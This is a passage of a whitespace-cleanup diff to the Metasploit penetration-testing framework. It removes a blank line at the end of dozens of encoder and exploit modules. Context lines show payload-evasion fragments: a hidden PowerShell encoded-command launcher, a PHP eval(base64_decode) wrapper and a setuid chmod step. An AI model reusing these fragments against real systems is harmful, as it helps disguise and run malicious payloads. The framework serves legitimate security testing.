b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 1ef2482fd1..649eabdbc5 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -50,5 +50,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Error: #{e.class} #{e}") end end - end diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 8d25535af1..c3b00b6c9b 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 249f547db4..26d301bd13 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -55,5 +55,4 @@ EOF return end end - end diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 72fde554a1..9da0fc6147 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Auxiliary prepare_exec(clean) end - end diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index a514e1a670..01c36f4dcf 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Auxiliary prepare_exec(clean) end - end diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index bbc1b5cf59..cf30230ac0 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -142,5 +142,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index 5776afe858..1ec7734ef6 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -122,5 +122,4 @@ class MetasploitModule < Msf::Auxiliary return true # set response to true end - end diff --git a/modules/encoders/cmd/echo.rb b/modules/encoders/cmd/echo.rb index 6b6d992214..f6703062c3 100644 --- a/modules/encoders/cmd/echo.rb +++ b/modules/encoders/cmd/echo.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Encoder return buf end - end diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index d7e5e337e8..ede81e43bb 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -138,5 +138,4 @@ class MetasploitModule < Msf::Encoder return buf end - end diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index 3bc18f74a7..2614f357b0 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -40,5 +40,4 @@ class MetasploitModule < Msf::Encoder buf.gsub!(/\s/, '${IFS}') return buf end - end diff --git a/modules/encoders/cmd/perl.rb b/modules/encoders/cmd/perl.rb index c2eb25710e..c9d4529a65 100644 --- a/modules/encoders/cmd/perl.rb +++ b/modules/encoders/cmd/perl.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Encoder # ends up unquoted so the shell doesn't try to expand a path. "qq#{sep}H#{hex.length}#{sep},qq#{sep}#{hex}#{sep}" end - end diff --git a/modules/encoders/cmd/powershell_base64.rb b/modules/encoders/cmd/powershell_base64.rb index 7ef1ad0dda..4939459add 100644 --- a/modules/encoders/cmd/powershell_base64.rb +++ b/modules/encoders/cmd/powershell_base64.rb @@ -48,5 +48,4 @@ class MetasploitModule < Msf::Encoder base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}")) cmd = "powershell -w hidden -nop -e #{base64}" end - end diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index 58330a2cf5..eff5471c85 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Encoder return ret end - end diff --git a/modules/encoders/generic/eicar.rb b/modules/encoders/generic/eicar.rb index 39c8434cac..72192700df 100644 --- a/modules/encoders/generic/eicar.rb +++ b/modules/encoders/generic/eicar.rb @@ -43,5 +43,4 @@ class MetasploitModule < Msf::Encoder def encode_block(state, buf) buf = eicar_test_string end - end diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index bb31669b61..b36591ebe1 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -23,5 +23,4 @@ class MetasploitModule < Msf::Encoder def encode_block(state, buf) buf end - end diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb index 2e72daf0c0..d81fa4658d 100644 --- a/modules/encoders/mipsbe/byte_xori.rb +++ b/modules/encoders/mipsbe/byte_xori.rb @@ -138,5 +138,4 @@ EOS stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack) return stub end - end diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index d620f3c4c6..7f7e361421 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -140,5 +140,4 @@ EOS return decoder end - end diff --git a/modules/encoders/mipsle/byte_xori.rb b/modules/encoders/mipsle/byte_xori.rb index b45c8eb2b7..7f240c45ed 100644 --- a/modules/encoders/mipsle/byte_xori.rb +++ b/modules/encoders/mipsle/byte_xori.rb @@ -138,5 +138,4 @@ EOS stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack) return stub end - end diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 4495ca05e8..0560d7d2ae 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -140,5 +140,4 @@ EOS return decoder end - end diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index bb522c3012..601c18bec3 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Encoder return "eval(base64_decode(" + b64 + "));" end - end diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index b04774e665..215f30122e 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Encoder::Xor stub end - end diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index 41c21796d1..b8e5cb07af 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Encoder::Xor def encode_end(state) state.encoded += [ state.key.to_i ].pack('N') end - end diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 345101eedf..cd2d08fe52 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -56,5 +56,4 @@ class MetasploitModule < Msf::Encoder::XorAdditiveFeedback badchars ) ? false : true) end - end diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 0801ae422e..a459fbd2b3 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -45,5 +45,4 @@ class MetasploitModule < Msf::Encoder::Xor return decoder end - end diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index eb441d2f78..f905d819d3 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -195,5 +195,4 @@ class MetasploitModule < Msf::Encoder def is_badchar(state, val) (val >= 0x41 and val <= 0x5a) or val == 0x5f or Rex::Text.badchar_index([val].pack('C'), state.badchars) end - end diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 703d06b347..c3f5964ed7 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -253,5 +253,4 @@ class MetasploitModule < Msf::Encoder def is_badchar(state, val) ((val >= 0x41 and val <= 0x5a) or val >= 0x80) or Rex::Text.badchar_index([val].pack('C'), state.badchars) end - end diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index e0b7d32555..6e201e1dbf 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -46,5 +46,4 @@ class MetasploitModule < Rex::Encoder::BloXor super( state ) end - end diff --git a/modules/encoders/x86/bmp_polyglot.rb b/modules/encoders/x86/bmp_polyglot.rb index a5a27beb91..cf4f8d5b05 100644 --- a/modules/encoders/x86/bmp_polyglot.rb +++ b/modules/encoders/x86/bmp_polyglot.rb @@ -172,7 +172,6 @@ class SizeCalculator def round_up_to_nop(opcode) BYTE_NOPS.find { |nop| opcode <= nop } end - end class MetasploitModule < Msf::Encoder diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index 46e5adbdb7..818ad97edb 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Encoder::Xor def saved_registers Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters']) end - end diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index 384a35c111..22d35ed3ba 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -193,5 +193,4 @@ protected Rex::Arch::X86::ESP, Rex::Arch::X86::ECX ], nil, state.badchars) end - end diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 6d387bd5c8..f463b6ee04 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -196,5 +196,4 @@ protected Rex::Arch::X86::ESP, Rex::Arch::X86::ECX ], nil, state.badchars) end - end diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index 50190b566d..028e68ab1e 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -182,5 +182,4 @@ protected Rex::Arch::X86::ESP, Rex::Arch::X86::ECX ], nil, state.badchars) end - end diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index d8516f152d..fc67ec09ff 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -42,5 +42,4 @@ class MetasploitModule < Msf::Encoder::XorAdditiveFeedback def encode_end(state) state.encoded += [ state.key ].pack(state.decoder_key_pack) end - end diff --git a/modules/encoders/x86/service.rb b/modules/encoders/x86/service.rb index 97847946bb..ce47537064 100644 --- a/modules/encoders/x86/service.rb +++ b/modules/encoders/x86/service.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Encoder return push_registers + code_service + pop_registers + block end - end diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index e01b3f8cac..f6816deea3 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -311,5 +311,4 @@ protected def dec(regnum) [0x48 + regnum].pack('C') end - end diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index 1ac9babb62..eb8d1d27d2 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -208,5 +208,4 @@ class MetasploitModule < Msf::Encoder state.encoded.sub!(marker_str, enc_len_str) state.encoded.sub!(marker_str, xor_key_str) end - end diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 2ec65944a4..6aa59f0faa 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Encoder::Alphanum def to_native(buffer) Rex::Text.to_unicode(buffer) end - end diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 8e79f271fe..fd998648c2 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Encoder::Alphanum def to_native(buffer) Rex::Text.to_unicode(buffer) end - end diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index 0441d0f2ac..32877ff389 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -169,5 +169,4 @@ chmod 4555 #{root_file} print_status("Exploit failed") false end - end diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index 30b659ce21..95768e9020 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -106,5 +106,4 @@ class MetasploitModule < Msf::Exploit::Remote vprint_error('EOFError') end end - end diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 83cb97e98d..e887eb939d 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -275,5 +275,4 @@ class MetasploitModule < Msf::Exploit::Remote # print_error('EOFError') end end - end diff --git a/modules/exploits/android/adb/adb_server_exec.rb b/modules/exploits/android/adb/adb_server_exec.rb index 6d7709aec7..0b1bf629e6 100644 --- a/modules/exploits/android/adb/adb_server_exec.rb +++ b/modules/exploits/android/adb/adb_server_exec.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end end - end diff --git a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb index 0cc86f6678..735c65a5e4 100644 --- a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb +++ b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb @@ -1207,5 +1207,4 @@ Please wait while we locate your content... details[my_target['Rop']] end - end diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 4be60ba2ac..c5fd35f3a2 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -132,5 +132,4 @@ class MetasploitModule < Msf::Exploit::Remote @pdf end - end diff --git a/modules/exploits/android/local/put_user_vroot.rb b/modules/exploits/android/local/put_user_vroot.rb index bdd8deb2bc..17c6d539da 100644 --- a/modules/exploits/android/local/put_user_vroot.rb +++ b/modules/exploits/android/local/put_user_vroot.rb @@ -74,6 +74,5 @@ class MetasploitModule < Msf::Exploit::Local session.fs.file.rm(remote_file) print_status("Waiting #{datastore['WfsDelay']} seconds for payload") end - end diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index f0060e7ab6..130b2e6cb3 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -164,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote tiff << hehe end - end diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index 3861999a27..b595528a75 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -166,5 +166,4 @@ class MetasploitModule < Msf::Exploit::Remote tiff << hehe end - end diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index cea02f4177..7e63d8ae54 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -85,5 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index 2715190bad..b5ffdb6161 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -212,5 +212,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_dialup end - end diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index becc932481..d20f9dcc74 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -204,5 +204,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb index 8d7f6155ed..14022dafed 100644 --- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb +++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb @@ -273,5 +273,4 @@ class MetasploitModule < Msf::Exploit::Remote def autofilter true end - end diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb index 37f3d708b3..9b4f52327a 100644 --- a/modules/exploits/freebsd/local/mmap.rb +++ b/modules/exploits/freebsd/local/mmap.rb @@ -106,5 +106,4 @@ class MetasploitModule < Msf::Exploit::Local print_status("Executing #{exploit_fname}") cmd_exec(exploit_fname) end - end diff --git a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb index 7c7f1f8d31..8e1994ed66 100644 --- a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb +++ b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Exploit::Local register_file_for_cleanup(dummy_filename) register_file_for_cleanup(filename) end - end diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index 64dd0fff70..cfff023f74 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -161,5 +161,4 @@ class MetasploitModule < Msf::Exploit::Remote c.put(pkt) c.disconnect end - end diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index a24a21b1f3..9738cc34a7 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 5da0687e6f..530f4a5608 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index 32da810af9..87bf1b0aae 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote ::IO.select(nil, nil, nil, 0.5) disconnect end - end diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 9e7ff6dadd..06d8f8a8c9 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index e3ff4a8515..45f2c54be3 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote handler print_status("Payload: #{payload.encoded}") end - end diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index 8ad8b40e20..1e37d9363c 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Exploit::Remote } }, timeout) end - end diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index 6a615feacc..c536f588df 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -229,5 +229,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 9e99fa1409..6013bf3554 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -437,5 +437,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 174e8527ff..a23c4d5757 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("This system appears to be patched") return Exploit::CheckCode::Safe end - end diff --git a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb index 5d8080941c..f5e6400989 100644 --- a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb +++ b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index 9fd18555bd..db40af827c 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Exploit::Remote 'agent' => cmd ) end - end diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 159f997464..2ffb9e3d48 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index bf901cd253..86a018a49d 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -350,5 +350,4 @@ class MetasploitModule < Msf::Exploit::Remote super # mixins should be able to cleanup even in case of Exception end end - end diff --git a/modules/exploits/linux/http/apache_continuum_cmd_exec.rb b/modules/exploits/linux/http/apache_continuum_cmd_exec.rb index 7be19d0f56..f31253a6d4 100644 --- a/modules/exploits/linux/http/apache_continuum_cmd_exec.rb +++ b/modules/exploits/linux/http/apache_continuum_cmd_exec.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote } ) end - end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index e1f32bea2a..35c6aa4fe2 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -180,5 +180,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 7c6c4e8779..b16266a542 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -133,5 +133,4 @@ class MetasploitModule < Msf::Exploit::Remote payload.encoded.each_byte { |c| p << "#{c},"} p end - end diff --git a/modules/exploits/linux/http/cisco_firepower_useradd.rb b/modules/exploits/linux/http/cisco_firepower_useradd.rb index 0364f14f54..0cd9d5307c 100644 --- a/modules/exploits/linux/http/cisco_firepower_useradd.rb +++ b/modules/exploits/linux/http/cisco_firepower_useradd.rb @@ -261,5 +261,4 @@ class MetasploitModule < Msf::Exploit::Remote @ssh_socket.close end end - end diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index ddb37d3a72..c14570454b 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Exploit::Remote select(nil, nil, nil, 10.0) end - end diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb index 61535552ac..0aecb6afd6 100644 --- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Exploit::Remote return nil end end - end diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb index a117ca7577..0fecd7c49b 100644 --- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb @@ -218,5 +218,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb index e8780131a5..1634db4e6f 100644 --- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb +++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb @@ -192,5 +192,4 @@ class MetasploitModule < Msf::Exploit::Remote return nil end end - end diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index e69621529f..0a1e806271 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end - end diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb index 69650003f6..c494b6352d 100644 --- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb +++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb @@ -254,5 +254,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/linux/http/efw_chpasswd_exec.rb b/modules/exploits/linux/http/efw_chpasswd_exec.rb index 610ba17a64..e75c5e8b4a 100644 --- a/modules/exploits/linux/http/efw_chpasswd_exec.rb +++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb @@ -164,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index ad58d7a292..11795f9e8f 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Command executed successfully") print_status("Output: \n#{res.body.split("Learned tokens")[0]}") end - end diff --git a/modules/exploits/linux/http/github_enterprise_secret.rb b/modules/exploits/linux/http/github_enterprise_secret.rb index ba914ba612..c068b867d0 100644 --- a/modules/exploits/linux/http/github_enterprise_secret.rb +++ b/modules/exploits/linux/http/github_enterprise_secret.rb @@ -164,7 +164,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status('Sending serialized Ruby stager...') send_serialized_data(dump, hmac) end - end =begin diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 1049eb3046..7aa0e8bdce 100644 --- 